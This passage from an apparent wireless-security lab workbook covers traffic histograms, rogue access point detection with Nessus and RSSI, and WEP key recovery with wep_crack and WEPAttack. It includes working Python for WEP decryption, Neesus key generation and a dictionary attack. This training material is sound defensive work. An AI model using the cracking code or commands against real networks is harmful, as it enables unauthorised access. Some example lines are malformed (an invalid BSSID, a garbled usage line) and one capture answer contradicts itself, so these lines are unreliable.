Capture 3

The traffic histogram for capture3.dump indicates a relatively narrow distribution of traffic. Even though this is a narrow distribution of traffic, it does not represent encrypted content (it was kind of a trick question, sorry). This is an example of a compressed file being transferred between two systems.
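The byte-distribution reasoning behind these histogram answers, and the Capture 3 trap in particular, can be reproduced with a few lines of code. The following is an added example, not the pcaphistogram tool or any other code from the workbook. It builds its own constructed payloads (deterministic pseudo-random bytes standing in for ciphertext, a word soup standing in for an ASCII transfer, and zlib output standing in for a compressed file; none are taken from the lab captures) and scores each by byte histogram, Shannon entropy and printable-byte fraction. The thresholds in classify() are the example's own choices.

```python
"""Byte-distribution triage of packet payloads, in the spirit of the
pcaphistogram analysis in Section 4.1. Added example; not the workbook's tool.

It shows the Capture 3 caveat concretely: a compressed payload looks just as
flat and high-entropy as an encrypted one, so a histogram separates plaintext
from non-plaintext, not encrypted from compressed.
"""
import math
import random
import zlib

# Constructed sample payloads (labelled as such): pseudo-random bytes stand in
# for ciphertext, a word soup for an ASCII file transfer, and zlib output for a
# compressed file. None of these come from the lab capture files.
_rng = random.Random(1)
_WORDS = ("wireless", "kismet", "capture", "filter", "eapol", "station",
          "channel", "prism", "header", "signal", "noise", "access", "point")

SAMPLE_TEXT = " ".join(_rng.choice(_WORDS) for _ in range(6000)).encode()
SAMPLE_RANDOM = bytes(_rng.randrange(256) for _ in range(4096))
SAMPLE_COMPRESSED = zlib.compress(SAMPLE_TEXT, 9)


def byte_histogram(data):
    """Count of each byte value 0x00..0xff: the raw data behind a histogram plot."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return counts


def shannon_entropy(data):
    """Bits per byte; 8.0 is perfectly flat, English text sits around 4-5."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in byte_histogram(data) if c)


def printable_fraction(data):
    """Share of bytes in 0x20..0x7e or tab/LF/CR (the 0x0a peak seen in Capture 5)."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D))
    return ok / len(data)


def classify(data, printable_min=0.9, entropy_min=7.0):
    """Coarse label: 'plaintext', 'high-entropy' (encrypted OR compressed), or 'binary'.

    The thresholds are this example's own; tune them against known traffic.
    """
    if printable_fraction(data) >= printable_min:
        return "plaintext"
    if shannon_entropy(data) >= entropy_min:
        return "high-entropy"
    return "binary"


if __name__ == "__main__":
    for label, data in (("text", SAMPLE_TEXT), ("random", SAMPLE_RANDOM),
                        ("compressed", SAMPLE_COMPRESSED)):
        print(f"{label:10s} entropy={shannon_entropy(data):.2f} "
              f"printable={printable_fraction(data):.2f} -> {classify(data)}")
```

Both the random and the compressed sample land in the same "high-entropy" bucket, which is exactly why the compressed transfer in capture3.dump can pass for encrypted traffic; telling the two apart needs content inspection (compression headers, known magic bytes) rather than a distribution statistic.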
Since the content is compressed to remove duplication, it can be mistaken for poorly-encrypted traffic. It is difficult to assess traffic of this type with a histogram, and it may require detailed packet inspection to identify patterns that could indicate repetitive compression file headers.

Capture 4

The traffic histogram for capture4.dump indicates an overall wide distribution of traffic that transitions from wide to narrow byte distribution. This is an example of a large Linux kernel being transmitted between two hosts over a TCP socket using Netcat. This is a good example of using a histogram to identify unencrypted traffic, since the capture does not contain an obvious distribution of bytes in the printable ASCII range of characters.

Capture 5

The traffic histogram for capture5.dump indicates a wide distribution of characters focusing around the printable ASCII character set, with a single peak near hexadecimal 0x20. This is obviously an unencrypted file, with the 0x20 byte indicating the space (" ") character. This capture is the result of transmitting the Kismet source code files over a TCP socket using Netcat. Note that another seemingly anomalous character is near the 0x0a byte, indicating the presence of a significant number of carriage-return characters (Enter).

Capture 6

The traffic histogram for capture6.dump indicates a relatively narrow distribution of characters, similar to capture number 3. Unlike capture number 3, this histogram represents the contents of encrypted traffic generated from an interactive SSH session between a Windows XP host and a Linux system.

Section 4.2.2

Question: Are all the strings listed in the file readable?

Answer: All strings consist of ASCII characters, but not all strings are recognizable words or phrases.

Question: What would cause unreadable strings in the file?
Answer: Data that happens to be in the printable ASCII character set that was not transmitted as ASCII data may show up as plaintext strings.

Question: How long are the majority of the strings that are not readable?

Answer: Many of the strings that are not readable are only 4 characters in length.

Question: How can we eliminate many of these non-readable strings?

Answer: The strings "-n" option allows us to specify a minimum string length. We can increase this default value to eliminate strings that are only 4 characters in length.

Section 4.2.4

Question: What strings are observed in the password-grep.txt file that are of concern?

Answer: There is an encrypted Cisco PIX enable password present in this capture file.

Section 4.2.5

Use the display filter: frame contains "enable password"

Section 4.2.6

Question: Is the configuration of a production PIX firewall revealed?

Answer: No, the string was present in an e-mail message from a CCIE study group discussing Cisco PIX configuration.

Question: What is the potential impact to the organization where this information was disclosed?

Answer: Low impact.

Section 4.3.3

Question: Which username(s) are used from multiple client stations?

Answer: "nthom", "llamont"

Question: What are the MAC addresses of the client stations that are sharing usernames?

Answer: nthom - 00:09:b7:13:a8:27, 00:40:96:42:bd:08
llamont - 00:0a:8a:47:db:7b, 00:40:96:a0:4c:5c

Question: How can an administrator use this information to enforce a policy that forbids sharing usernames?

Answer: Regularly audit the EAPOL authentication process to identify stations sharing usernames and lock the usernames, denying authentication.

Lab 5 - Rogue Network Threats

Complete the exercises in this lab to reinforce the material covered in the Rogue Network Threats module. To complete these exercises, you will need the materials included in the SWAT toolkit.
Lab 5-1: Identifying Rogues with Nessus

Purpose: The steps in this lab give the student hands-on experience scanning for rogues using wired-side analysis techniques.

Description: In this lab we will use the Nessus tool to perform wired-side scanning to locate a rogue access point. While this is far from a comprehensive method to locate rogue devices on a network, it can be used almost immediately when you return to your organization to identify rogue AP threats at no cost. Always remember to get permission before launching any kind of vulnerability scan on your organization's network.

5.1.1. Connect to the classroom network

Execute the following commands from a shell prompt to connect to the SANS-ROGUE01 network:

# killall dhcpcd
# iwconfig wlan0 essid SANS-ROGUE01 enc off mode managed
# dhcpcd -d wlan0

At this point, your system should be connected to the SANS-ROGUE01 network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance.

5.1.2. Launch Nessus

Now that your system has established network connectivity, launch the Nessus vulnerability scanner.

5.1.2.1 Start the Nessus Server

Initiate the Nessus server from a shell prompt by running the "nessusd" command, as shown below:

# nessusd -D
All plugins loaded
#

After the Nessus server has started, invoke the Nessus client by running the "nessus" command, as shown below:

# nessus

After the client startup has completed, you will be presented with the Nessus login window, as shown below.

Nessus Setup client interface window

5.1.3. Login to Nessus

After the Nessus client starts, you will be presented with a window requesting a login name and a password. Supply the username "root" and the password "tor", then click "Login". After clicking login you will be presented with the "SSL Setup" dialog, asking you to choose your level of SSL paranoia.
Since only the local system can access the Nessus server, this connection doesn't need to be too paranoid; simply click OK at this dialog box, then click "Yes" to accept the displayed certificate information.

5.1.4. Configure Nessus scanning options

After logging into Nessus you will be presented with the "Plugins" screen. By default, Nessus will include several default plugins to identify vulnerabilities on a variety of systems. We will configure the plugins to only use the rogue access point detection plugin.

Click the "Filter" button to open the "Filter plugins ..." window. Select the "ID number" checkbox (disable the "Name" checkbox, if selected) and enter the plugin number "11026" in the "Pattern:" text-box, then click OK. Click the "General" plugin family name. Next, select the "Access Point Detection" plugin to open the detail window for this plugin, as shown below.

Nessus plugin selection dialog

Access point scanning plugin detail window

Examine the information associated with this plugin, including the dependency information, then click Close. Next, select the "Enable dependencies at runtime" checkbox. This will enable Nessus to call other plugins that are associated with the access point detection plugin (such as the SNMP scanner plugin) as needed.

Next, click the "Scan Options" tab to define additional scanning characteristics. Ensure the "Safe Checks" checkbox is disabled, as this is needed to use the Nessus OS fingerprinting functionality when scanning hosts (leaving "Optimize the test" selected). Change the port-range selection to "21-80", as shown below. This reduces the number of ports to those that are useful to the rogue AP detection plugin, helping speed up the scan.

Next, click the "Target selection" tab. In the "Target(s)" textbox, enter the IP address range for the lab network ("10.0.0.1-10.0.0.20"). DO NOT include any spaces between addresses when specifying the range.
Disable the "Perform a DNS zone transfer" checkbox, as shown below.

Nessus "Scan options" window.

Nessus "Target selection" window.

5.1.5. Initiate the scan

After configuring the required scan options, click the "Start the scan" button on the bottom of the Nessus client window. A progress bar will be displayed for each host that is scanned, as shown below.

Nessus scanning progress indicator.

5.1.6. Assess the report

After completing the scan, Nessus will launch the "Nessus NG Report" interface, categorizing the networks and hosts scanned, open ports and the severity of vulnerabilities identified by Nessus. Click on the appropriate subnet, host, port and vulnerability as identified by Nessus.

Question: Was Nessus able to identify a potentially rogue access point on the network?

Question: What information did Nessus provide about the rogue access point?

Question: How could an administrator disable the access point from a remote location?

Quit Nessus after assessing the report results.

Lab 5-2: Examine RSSI Data

Purpose: This lab will examine the collection of radio signal strength information (RSSI) in a special packet capture header.

Description: RSSI information is valuable when trying to locate a rogue access point from wireless-side analysis, allowing us to identify a relative distance between a monitoring station and a transmitting device. This lab will examine the information that is provided in RSSI data and how this information can be manually collected with the HostAP drivers. We'll also look at the capture information provided by a WildPackets AiroPeek NX driver.

5.2.1. Configure HostAP for RSSI

RSSI information is collected in a special operating mode supported by the HostAP drivers. When the firmware on the wireless card receives a packet, it examines the signal levels reported by the embedded radio and reports this information to the driver.
The HostAP driver formats the information in a standard packet header format that we can examine with a tool like Wireshark.

Configure your HostAP drivers to report RSSI information while collecting data in monitor mode on channel 1 (2.412 GHz). Note that this exercise assumes you have the SWAT wireless card already inserted in your laptop and have a working "wlan0" interface.

# cd /tmp/lab5
# iwconfig wlan0 mode monitor channel 1
# ifconfig wlan0 up
#

In monitor mode, HostAP will report packets received from the wireless interface without the RSSI information included. To enable RSSI data reporting, we need to issue a separate instruction to the HostAP driver with the private parameter configuration tool (iwpriv). Execute the iwpriv command as listed below.

# iwpriv wlan0 monitor 3
#

Mode "3" enables reporting of RSSI data, while mode "2" will return to traditional monitor mode. Mode "0" returns the card configuration to managed/station mode.

5.2.2. Start Wireshark

We'll use Wireshark to capture and assess the RSSI information in packets that we have collected. Start the Wireshark sniffer by clicking "K > Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the "Run" button.

5.2.3. Initiate a Packet Capture

After starting Wireshark, collect some sample data from the wireless network by initiating a packet capture. Click "Capture > Start" to open the "Wireshark: Capture Options" dialog, as shown below. Click OK to start the packet capture.

After clicking OK, Wireshark will open the "Captured Packets" window, indicating the number and type of packets captured. After roughly 100 packets or so, click "Stop" to end the capture. Wireshark will close the "Captured Packets" window and display the contents of the packets that were captured.

Wireshark capture options dialog

Wireshark capture progress dialog

5.2.4. Assess RSSI Data

In the protocol dissector view for the Wireshark capture, a new tree of information is listed as "Prism Monitoring Header". Expand this tree to display the information in this header, as shown below.

Wireshark window including Prism Monitoring Header information

The "Signal:" line indicates the signal level of the packet when it was received by the wireless card, represented in hexadecimal format. The Prism2 wireless cards supported by HostAP do not provide a signal measurement in decibels; rather, it is a raw number in the range of 0-255. Wireshark represents this value in hexadecimal format, as in the example above where the signal measurement is "0xd0". We can convert this value using a hexadecimal-to-decimal calculator or at a shell prompt with the "printf" tool as shown below.

# printf "%d\n" 0xd0
208
#

In this example, the signal strength of the selected packet is hexadecimal 0xd0 or decimal 208. Note that the signal information can jump with short bursts of increased or decreased signal strength due to variations in noise levels and multipath characteristics. This is normal behavior that must be accounted for when assessing RSSI characteristics.

Randomly sample the signal strength information for 5 packets with the same source MAC address, recording the information below. It may be helpful to select a single source MAC address and apply a display filter on the "wlan.sa" display field name. You may opt to skip packets that report a temporarily anomalous signal level.

Packet Number    Signal

5.2.5. Assess RSSI Data for an Alternate Location

Move your laptop to a different location and repeat the previous step. When prompted to save the previous packet capture, select "No". Record the results from the second packet capture below.

Packet Number    Signal

Question: What is characteristically different in the signal level between the two packet captures?
Question: Does the signal level correspond to the expected results according to your relative position to the access point?

5.2.6. Assessing RSSI in AiroPeek NX Captures

RSSI information is also stored in packet captures created with the WildPackets AiroPeek NX tool, often in a friendlier format than what is reported by the HostAP drivers. Using Wireshark, clear any applied display filter by clicking the "Clear" button on the Filter toolbar. Next, open the supplied AiroPeek NX packet capture in the /tmp/lab5 folder named "airopeek-capture.apc" by clicking "File > Open". When prompted to save the capture file generated in the previous lab step, select "Continue Without Saving". Next, navigate to the /tmp/lab5 folder, select the "airopeek-capture.apc" file and click "OK". Wireshark will open the capture file and present the contents as displayed below.

Wireshark capture dissecting the supplied AiroPeek NX packet capture file.

The AiroPeek NX packet capture uses a proprietary file format for saving packet contents, including the signal strength, indicated as a relative percentage, immediately before the frame control header. Expand the "IEEE 802.11" tree to reveal the data rate, channel and signal strength information in this packet capture. Examine the signal level for several packets with the source MAC address "00:40:96:a0:1e:82". Minor fluctuations are reported, but the relative signal level remains largely consistent. Scroll to packet 73 from source address 00:09:b7:13:a8:27. Note that the signal strength information for this source is significantly reduced from that of the previous source.

Question: What would explain the consistent difference in signal strength for these two stations?

(Hint: Keep the capture source of the AiroPeek NX software in mind)
(Hint: What is indicated by the relative signal level of the 00:40:96:a0:1e:82 station?)
(Hint: What is indicated by the relative signal level of the 00:09:b7:13:a8:27 station?)

Exit Wireshark after completing this step.

Lab 5-3: Sample RSSI with kis-snr

Purpose: This lab will introduce the kis-snr tool that can be used with Kismet to automate the sampling of signal information for a given BSSID.

Description: In this lab we will initiate Kismet to collect traffic on a specific channel while reporting RSSI information, using the kis-snr script to collect and average the signal and noise information. This is a valuable technique to use when trying to document the relative signal level of a rogue device in an unknown location.

5.3.1. Launch Kismet

Start Kismet by clicking "K > Backtrack > Wireless Tools > Analyzer > Kismet". Backtrack will automatically select the first appropriate wireless card and start Kismet, saving the files in the root user's home directory ("/root").

5.3.2. Select a Network BSSID

Use the Kismet detail view to identify the BSSID for a selected network that is identified. Note that you will have to change the default sort order from "Autofit" (change the sort order by pressing "s", then "f" for first-seen). Note the BSSID of the selected network below:

BSSID:

5.3.3. Sample Signal and Noise with kis-snr

Open an XTerm window and change to the /tmp/lab5/kis-snr directory, as shown below.

# cd /tmp/lab5/kis-snr
# pwd
/tmp/lab5/kis-snr
#

Next, launch the kis-snr tool with no options to get a list of command-line parameters.

# ./kis-snr.pl
kis-snr.pl - collect SNR data from a Kismet server.
ERROR: Must specify a BSSID to monitor
Usage: kis-snr.pl [options]
  -s, --server HOST or HOST1:2502
  -b, --bssid 00:01:02:03:04:05
  -d, --duration SECONDS [default 30]
e.x. kis-snr.pl -b 00 ££:90
e.x. kis-snr.pl -s server -b 00:80:1D:F0:30:12
#

Next, test the kis-snr tool with the BSSID you selected in the previous step.
# ./kis-snr.pl -b 00:00:41:RG:6A789
Sampling data for 30 seconds
Done
Average signal level is 167.62 (MAX: 169, MIN: 167)
Average noise level is 165.62 (MAX: 168, MIN: 165)
Samples: 3520
Reverting server to channel hopping.
#

The kis-snr tool will connect to the local Kismet server and instruct the server to lock the channel number to the corresponding channel used by the specified BSSID. After sampling the data, kis-snr will revert back to channel hopping. This is demonstrated in the Kismet status window, as shown below.

Kismet status window indicating locked and unlocked channel.

Next, sample data for the selected BSSID from multiple locations. Optionally, you may wish to pirouette while collecting data to obtain a better average from each location. Record the information collected with kis-snr in the boxes below.

Location 1    Signal:        Noise:        Samples:
Location 2    Signal:        Noise:        Samples:
Location 3    Signal:        Noise:        Samples:
Location 4    Signal:        Noise:        Samples:

Question: Does the average signal, noise and sample count reflect the relative distance to the access point?

Note: Collecting signal level information in this fashion may be skewed when there is a large amount of traffic from multiple sources on the network. You can increase the accuracy of signal/noise/samples collection by increasing the kis-snr sampling time with the "-d" parameter.

Quit Kismet when you have completed this step.

This completes our fifth lab exercise. Congratulations.

Answers

Section 5.1.6

Question: Was Nessus able to identify a potentially rogue access point on the network?

Answer: This will depend on your operating environment. In the classroom lab, at least one rogue access point should be identified.

Question: What information did Nessus provide about the rogue access point?

Answer: This will depend on your operating environment. In the classroom lab, the node at 10.0.0.7 is identified as a rogue access point (Linksys WRT).

Question: How could an administrator disable the access point from a remote location?
Answer: An administrator could use the MAC address to identify the switchport that this node is connected to, and disable the access point's network connectivity by disabling the port.

Section 5.2.5

Question: What is characteristically different in the signal level between the two packet captures?

Answer: This will depend on your operating environment. In practice, the two packet captures should report different signal strength values, provided the captures were taken at varying distances from the access point. The packet capture with the higher signal level was taken closer to the access point. If the signal level does not differ between the two captures, you may opt to repeat this step, taking a third capture at a greater distance from the access point.

Question: Does the signal level correspond to the expected results according to your relative position to the access point?

Answer: This will depend on your operating environment. Factors including noise, interference and signal quality will affect this answer.

Section 5.2.6

Question: What would explain the consistent difference in signal strength for these two stations?

Answer: The station capturing the wireless traffic was closer to the node at 00:40:96:a0:1e:82 than the node at 00:09:b7:13:a8:27.

Section 5.3.3

Question: Does the average signal, noise and sample count reflect the relative distance to the access point?

Answer: This will depend on your operating environment. In practice, kis-snr will report a higher average signal strength for a selected BSSID when the monitoring station is closer to the access point.

Lab 6 - Auditing WEP Networks

Complete the exercises in this lab to reinforce the material covered in the Auditing WEP Networks module. To complete these exercises, you will need the materials included in the SWAT toolkit.

Lab 6-1: Examining WEP Traffic

Purpose: Provide an introduction to several tools to recover WEP keys using a variety of different recovery methods.
Description: In this lab, we'll take a look at the WEP header format and recover the WEP key from a variety of supplied capture files, exploiting different weaknesses in WEP and WEP implementations. We'll also assess a lab network to recover a WEP key in a live environment.

6.1.1. Examine the WEP Header

In every WEP packet is an initialization vector, key index number and integrity check value. Let's take a look at these fields in a sample packet capture file. Open an XTerm window and change to the /tmp/lab6 folder. Use Wireshark to display the contents of the "nd1.dump" file, as shown below.

# cd /tmp/lab6
# pwd
/tmp/lab6
# wireshark -r nd1.dump -n &
[1] 2426
#

Wireshark will display the contents of the nd1.dump packet capture file. In the packet dissector view, expand the "IEEE 802.11" tree, then expand the "WEP parameters" tree, as shown below.

Wireshark protocol dissector for WEP header data.

Select the "Initialization Vector" value to highlight the corresponding bytes in the packet detail view for frame 1. Note the initialization vector value. Select the next packet from the same source MAC address (frame 3). Note the IV value for this packet as well. Repeat this step for frame 4.

Question: What is the relationship between the IV values in frames 1, 3 and 4? Are they random or sequentially selected?

Next, select frames 2, 5 and 6, noting the IV values for each.

Question: What is the relationship between the IV values in frames 2, 5 and 6?

Close Wireshark at the end of this step to release the nd1.dump file.

6.1.2. Recovering Neesus Datacom 40-bit Keys

In the course module we reviewed the weakness in Neesus Datacom 40-bit keys. In this step we'll use the wep_crack tool by Tim Newsham to recover the WEP key in the supplied packet capture files. First, run the "wep_crack" tool with no parameters to identify the available command-line options and usage.
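Before turning to wep_crack, the per-station IV inspection of step 6.1.1 is worth seeing as code, since an auditor documenting a WEP deployment usually wants the IV behaviour of every transmitter, not of six hand-picked frames. The following is an added example, not the workbook's or any tool's own code. It parses the WEP fields (3-byte IV, key-index byte, trailing ICV) from 802.11 data frames and labels each transmitter's IV sequence as sequential, random or reused; it decrypts nothing and never touches the key. The frames are constructed with made-up locally administered addresses, filler body and ICV bytes, and the IV is read as a 24-bit little-endian integer, which is this example's assumption about byte order.

```python
"""Pull the WEP initialization vector, key index and ICV out of 802.11 data
frames and classify how each transmitter chooses its IVs.

Added example, not the workbook's own code. It repeats the inspection of step
6.1.1 without Wireshark, over a few constructed frames, and does not decrypt
anything or touch the key.
"""

MAC_HDR = 24   # FC(2) dur(2) addr1(6) addr2(6) addr3(6) seq(2): no QoS/HT fields
IV_LEN = 4     # 3-byte IV followed by the key-index byte
ICV_LEN = 4    # CRC-32 integrity check value at the end of the encrypted body


def build_wep_frame(ta, peer, iv, key_idx, body, to_ds=True):
    """Constructed WEP data frame. The body and ICV are filler bytes, not
    real RC4 output; only the header layout matters to the parser below."""
    flags = 0x40 | (0x01 if to_ds else 0x02)       # Protected bit + direction
    fc = bytes([0x08, flags])                       # type 2 (data), subtype 0
    # addr2 is always the transmitter; addr1/addr3 differ by DS direction
    addr1, addr2, addr3 = (peer, ta, peer) if to_ds else (peer, ta, ta)
    hdr = fc + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00"
    iv_field = iv.to_bytes(3, "little") + bytes([(key_idx & 0x3) << 6])
    return hdr + iv_field + body + b"\xde\xad\xbe\xef"


def parse_wep_fields(frame):
    """Return {'ta', 'to_ds', 'iv', 'key_idx', 'icv'} for a protected data
    frame, or None for anything else (management, control, unprotected).

    The IV is read as a 24-bit little-endian integer; this example assumes that
    byte order throughout, matching the builder above.
    """
    if len(frame) < MAC_HDR + IV_LEN + ICV_LEN:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2 or not fc1 & 0x40:   # not data / not protected
        return None
    return {
        "ta": frame[10:16].hex(":"),
        "to_ds": bool(fc1 & 0x01),
        "iv": int.from_bytes(frame[MAC_HDR:MAC_HDR + 3], "little"),
        "key_idx": frame[MAC_HDR + 3] >> 6,
        "icv": frame[-ICV_LEN:],
    }


def iv_pattern(ivs):
    """'sequential' when each IV is the previous plus one, 'reused' when a
    value repeats, 'random' otherwise; 'insufficient' with fewer than 2 IVs."""
    if len(ivs) < 2:
        return "insufficient"
    if len(set(ivs)) != len(ivs):
        return "reused"
    if all(b - a == 1 for a, b in zip(ivs, ivs[1:])):
        return "sequential"
    return "random"


def iv_report(frames):
    """Group IVs by transmitter address in capture order and label each pattern."""
    seen = {}
    for frame in frames:
        rec = parse_wep_fields(frame)
        if rec is not None:
            seen.setdefault(rec["ta"], []).append(rec["iv"])
    return {ta: {"ivs": ivs, "pattern": iv_pattern(ivs)} for ta, ivs in seen.items()}


# Constructed capture (made-up, locally administered addresses): STA_A counts
# its IVs up from 0x001000, STA_B picks them at random and repeats one.
STA_A = bytes.fromhex("020000000001")
STA_B = bytes.fromhex("020000000002")
AP = bytes.fromhex("0200000000aa")
SAMPLE_FRAMES = [
    build_wep_frame(STA_A, AP, 0x001000, 0, b"\x11" * 16),
    build_wep_frame(STA_B, AP, 0x3a91c2, 1, b"\x22" * 16),
    build_wep_frame(STA_A, AP, 0x001001, 0, b"\x11" * 16),
    build_wep_frame(STA_A, AP, 0x001002, 0, b"\x11" * 16),
    build_wep_frame(STA_B, AP, 0x07f4e1, 1, b"\x22" * 16),
    build_wep_frame(STA_B, AP, 0x3a91c2, 1, b"\x22" * 16),
    bytes([0x80, 0x00]) + bytes(40),   # management frame (beacon type): ignored
]

if __name__ == "__main__":
    for ta, info in iv_report(SAMPLE_FRAMES).items():
        print(ta, info["pattern"], [hex(iv) for iv in info["ivs"]])
```

Grouping by addr2 (the transmitter) rather than by wlan.sa is deliberate: the device that encrypts the frame is the one choosing the IV, so a sequential or repeating pattern is a property of that radio's driver or firmware, and that is what an audit finding should name.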
Note that at the time of this writing, wep_crack is not included in the Backtrack Linux distribution. Instead, a static binary of this tool has been provided in the lab6 directory.

# wep_crack
Usage: ./wep_crack [-b] [-s] [-k num] packfile [wordfile]
    -b      Bruteforce the key generator
    -s      Crack strong keys
    -k num  Crack only one of the subkeys without using a key generator
Wordfile must be specified when -b is not used
#

We can see from this output that wep_crack supports both a brute-force attack as well as a dictionary attack. Since other tools are better suited to mounting a dictionary attack against WEP keys, we'll just use wep_crack in the brute-force mode.

Attempt to recover the WEP key in the "nd1.dump" file by running wep_crack with the "-b" option, specifying the capture file as the last command-line argument, as shown below:

# wep_crack -b nd1.dump

Question: Was wep_crack able to recover the WEP key for the nd1.dump file?

Question: What is the WEP key used for this capture file? Please note the key somewhere handy.

Question: How many seconds did wep_crack take to recover the key? How many guesses per second was wep_crack able to perform?

Note that the string listed in the "generated by" message from wep_crack is not necessarily the same string that was used to generate the key. Rather, it is a string that will generate the same WEP key, representing a collision with the actual key. In an audit report, it is best to report the 40-bit WEP key in hex instead of the ASCII Neesus Datacom string.

Repeat this step for the nd2.dump packet capture file.

Question: What is the WEP key for the nd2.dump packet capture? How long did it take to recover the key?

Repeat this step for the nd3.dump packet capture file. Note that the key selected for the WEP network captured in this file was not generated with the Neesus Datacom algorithm, and will not be recovered with wep_crack.
In this case, simply note the total amount of time required to test all 2^21 (2,097,152) possible generator seeds in the wep_crack brute-force algorithm.

Question: How long did wep_crack take to test all permutations of keys for the nd3.dump file?

6.1.3. Mounting a Dictionary Attack

A dictionary attack can be a very resource-intensive attack. Like the wep_crack brute-force attack, it only requires one or two packets, but it can take a significant time to complete. In the lab6 directory we have included a small English word list to use in conjunction with the WEPAttack tool. We can use the Unix "wc" tool to identify how many words are included in the file by counting the number of lines with the "-l" parameter.

# wc -l words
135425 words
#

This is a small dictionary file by all accounts. In an actual audit, a significantly larger dictionary file should be used that includes words from several languages, names, pop-culture references, variations of the company name and department, etc.

Next, run the WEPAttack tool with no command-line arguments to get a list of available options.

# wepattack
WEPATTACK by Dominik Blunk and Alain Girardet - Version 0.1.3
usage: wepattack -f dumpfile [-w wordfile] [-m mode] [-n network]
  -f dumpfile   network dumpfile to read (in PCAP format as TCPDUMP or ETHEREAL uses)
  -w wordlist   wordlist to use (default: stdin)
  -m mode       run wepattack in different modes (default: all)
                values: 64, 128, n64, n128
#

Run WEPAttack against the "wepattack1.dump" capture file, supplying the word list with the "-w" option (wepattack -f wepattack1.dump -w words).

Question: Was WEPAttack able to recover the WEP key from the wepattack1.dump capture file?

Question: What is the key that was recovered? Please note the key somewhere handy.

Question: Which of the four WEPAttack modes is reported as the mechanism used to generate the key that was discovered?

Question: How long did it take to recover the key? How many words per second is WEPAttack able to test?

Repeat this step for the "wepattack2.dump" capture file.

Question: Were you able to recover the key from the wepattack2.dump file? How long did wepattack run?
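To see what wep_crack and WEPAttack actually do with a captured frame, here is an added Python example that is not code from the workbook or from either tool. It implements the decrypt-and-check-ICV test that makes a single packet sufficient, the Neesus Datacom 40-bit generator from 6.1.2 together with the seed collision property that explains why the "generated by" string can differ from the real passphrase, and a small dictionary attack that tries plain ASCII 64/128-bit keys and generated keys for each word. The decrypt step is the same operation airdecap-ng and Wireshark perform in 6.1.6 once the key is known. The frame, word list and passphrase are constructed, and zero-padding short ASCII keys is an assumption made here, not the tools' documented behaviour.

```python
# Added example, not code from the SANS workbook, wep_crack or WEPAttack.
# One captured WEP frame is enough to test a candidate key: decrypt with
# RC4(IV || key) and check the CRC-32 ICV. The word list is turned into
# candidate keys the way plain ASCII 64/128-bit keys and the Neesus Datacom
# generator would produce them. The frame, word list and passphrase are
# constructed; zero-padding short ASCII keys is an assumption.
import zlib


def rc4_keystream(key, length):
    """RC4 key scheduling followed by `length` bytes of keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(data, iv, key, key_index=0):
    """Frame body as sent on the air: IV(3) | key ID byte | RC4(data | ICV)."""
    icv = zlib.crc32(data).to_bytes(4, "little")          # ICV is CRC-32, little-endian
    plain = data + icv
    ks = rc4_keystream(iv + key, len(plain))
    return iv + bytes([key_index << 6]) + bytes(p ^ k for p, k in zip(plain, ks))


def wep_decrypt(body, key):
    """Plaintext data if the ICV verifies under `key`, else None.

    A wrong key passes this check with probability 2^-32, which is why one
    packet is enough for a dictionary attack."""
    iv, payload = body[:3], body[4:]
    ks = rc4_keystream(iv + key, len(payload))
    plain = bytes(c ^ k for c, k in zip(payload, ks))
    data, icv = plain[:-4], plain[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None


def neesus_keys(passphrase):
    """Neesus Datacom 40-bit generator: XOR the ASCII passphrase into a
    32-bit seed (one byte per lane), then step a linear congruential
    generator 20 times, taking bits 16..23 of each state as a key byte."""
    lanes = [0, 0, 0, 0]
    for i, ch in enumerate(passphrase.encode("ascii")):
        lanes[i % 4] ^= ch
    seed = lanes[0] | lanes[1] << 8 | lanes[2] << 16 | lanes[3] << 24
    keys = []
    for _ in range(4):
        key = bytearray()
        for _ in range(5):
            seed = (seed * 0x343FD + 0x269EC3) & 0xFFFFFFFF
            key.append((seed >> 16) & 0xFF)
        keys.append(bytes(key))
    # Only seed bits 0..23 can reach bits 16..23 of later states, and ASCII
    # clears bit 7 of each lane: 2^21 distinct seeds. Every passphrase therefore
    # collides with many others, e.g. any two differing only in characters 4, 8, 12...
    return keys


def candidate_keys(word):
    """Keys a word list entry may stand for: its bytes as a 5- or 13-byte key
    (truncated or zero-padded, an assumption) and the four generated 40-bit keys."""
    raw = word.encode("ascii", "ignore")
    yield raw[:5].ljust(5, b"\0")
    yield raw[:13].ljust(13, b"\0")
    yield from neesus_keys(word)


def dictionary_attack(body, words):
    """First (word, key) whose key decrypts `body` with a valid ICV, else None."""
    for word in words:
        for key in candidate_keys(word):
            if wep_decrypt(body, key) is not None:
                return word, key
    return None


# Constructed frame: LLC/SNAP header plus a short message, encrypted under the
# first generated key of the constructed passphrase "sans617", IV 0c:0d:0e.
SAMPLE_KEY = neesus_keys("sans617")[0]
SAMPLE_DATA = bytes.fromhex("aaaa030000000800") + b"hello from the lab network"
SAMPLE_BODY = wep_encrypt(SAMPLE_DATA, bytes.fromhex("0c0d0e"), SAMPLE_KEY)
WORDS = ["stanton", "backpackers", "chivalric", "perpetuate", "sans617"]

if __name__ == "__main__":
    word, key = dictionary_attack(SAMPLE_BODY, WORDS)
    print("generated by %r -> wep key %s" % (word, key.hex(":")))
    print("plaintext:", wep_decrypt(SAMPLE_BODY, key))
```

A real capture needs the 802.11 header stripped first; the body handed to wep_decrypt starts at the IV, exactly the bytes Wireshark shows under "WEP parameters". Note that the ASCII key mode and the generator mode produce different keys from the same word, which is why WEPAttack reports which mode recovered the key.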
6.1.4. Mounting an Extended Dictionary Attack

In the previous step, the file "wepattack2.dump" did not reveal the WEP key from the supplied dictionary file. We can extend a dictionary attack by including common permutations of words with John the Ripper, piping the output of John to WEPAttack.

